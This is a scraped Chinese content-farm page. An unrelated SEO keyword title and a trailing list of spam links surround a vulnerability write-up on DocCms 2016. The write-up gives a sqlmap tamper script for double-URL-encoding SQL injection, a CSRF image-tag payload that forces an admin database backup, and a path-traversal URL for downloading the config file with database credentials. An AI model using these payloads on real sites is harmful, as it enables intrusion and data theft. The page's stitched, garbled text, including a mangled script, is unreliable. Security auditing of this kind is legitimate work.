当前位置: 首页 > news >正文

电商网站开发平台哪家好百度运营怎么做

电商网站开发平台哪家好,百度运营怎么做,做网站的网页图片素材怎么找,兰州网站建设专家0x01 前言 DocCms[音译#xff1a;稻壳Cms] #xff0c;定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统#xff0c;服务于企业品牌信息化建设#xff0c;也适应用个人、门户网站建设… 0x01 前言 DocCms[音译稻壳Cms] 定位于为企业、站长、开发者、网络公司、VI策划设计公司、SEO推广营销公司、网站初学者等用户 量身打造的一款全新企业建站、内容管理系统服务于企业品牌信息化建设也适应用个人、门户网站建设 0x02 环境搭建 DocCms官网http://www.doccms.com 程序源码DocCms2016 下载地址https://pan.baidu.com/s/1pLclifL 0x03 SQL注入 代码分析 在/content/search/index.php中首先对参数keyword进行非法字符检测 进一步追溯checkSqlStr函数看代码如何过滤在/inc/function.php中 checkSqlStr函数对传入的字符串进行正则匹配检测是否函数非法字符。 继续看在/content/search/index.php中的get_search_result函数 参数keyword进行非法字符检测后进行url解码然后拼接到SQL语句中执行。 如果我们传入双重url编码的字符串将绕过非法字符检测然后经urldecode解码带入数据库中执行导致SQL注入漏洞存在。 漏洞利用 双重URLencode编码绕过可通过编写tamper绕过URLencode双重编码tamper脚本如下 #!/usr/bin/env python import re from urllib import quote from lib.core.data import kb from lib.core.enums import PRIORITY__priority__ PRIORITY.NORMALdef dependencies():pass def tamper(payload, **kwargs):retVal payloadretVal quote(quote(retVal)) return retVal 通过SQLMAP加载tamper脚本获取数据库敏感数据 0x04 CSRF 代码分析 在\doccms\admini\controllers\system\back.php export函数直接对提交上来的参数tables/sizelimit进行处理导出sql备份文件未对访问来源进行有效验证导致数据库备份模块存在CSRF漏洞。 漏洞利用 1、构造CSRF漏洞利用代码只备份管理员用户表doc_user H2 CRSFTester/H2 img srchttp://127.0.0.1:80/admini/index.php?msystemsbakupaexporttables[]doc_usersizelimit2048dosubmit开始备份数据 width0 height0 border0/2、在网站首页在线留言提交CSRF漏洞利用代码 3、当管理员在后台查看留言信息时自动备份数据库到/doccms/temp/data目录下 0x05 任意文件下载 代码分析 在\doccms\admini\controllers\system\back.php中, download函数只对文件名进行简单的判断然后把filename拼接到路径中进行下载导致网站存在任意文件下载漏洞。 漏洞利用 1、构造url下载全局配置文件获取敏感信息http://127.0.0.1/admini/index.php?msystemsbakupadownloadfilename../../config/doc-config-cn.php    2、获取到数据库账号密码等敏感信息   未完待续。
http://www.zqtcl.cn/news/648474/

相关文章:

  • 品牌网站如何做seo浏览器正能量网址
  • 开封做网站哪家好网页设计制作网站大一素材
  • 河南网站域名备案莱芜新闻电视台节目表
  • 长春网站建设新格做天猫还是做网站推广
  • 新网站建设的感想安阳区号是什么
  • 余姚市城乡建设局网站wordpress 预览插件
  • 游戏开发和网站开发wordpress foreign trade
  • 网站设计 原型图html购物网站模板
  • 谷歌网站推广报价国产搜什么关键词最好看
  • 婚礼网站有哪些个人做网站需要什么条件
  • 深圳企业网站seo人才招聘网站建设
  • 谷歌下载seo是什么软件
  • 个人网站设计分析小程序在线制作平台
  • 网站开发 一般用什么语言vi视觉设计案例
  • 微信公众平台官方网官网seo优化找哪家做
  • 简约 网站模板网站目录链接怎么做
  • 国内地铁建设公司网站大连做网站外包
  • 微网站营销是什么网站图片上传代码
  • 外包公司做网站多少用vs做的网站怎么打开
  • 兴义城乡建设部网站企业服务器配置方案
  • 淘宝客网站根目录wordpress调用导航代码
  • 海外免费网站推广网站开发项目报告书
  • 大气的金融网站深圳专门做兼职的网站
  • 最新网站备案四平网站公司
  • 济宁恒德建设有限公司网站互联网营销师报名入口
  • 做灯饰的企业都会在哪些网站网站排名恢复
  • 互联网公司网站建设价格跨境支付互联互通
  • 杭州 高端网站 开发宜昌建设网站公司
  • 咋样做网站快照济南建设质量协会网站
  • 学校网站怎么建设兄弟网络(西安网站建设制作公司)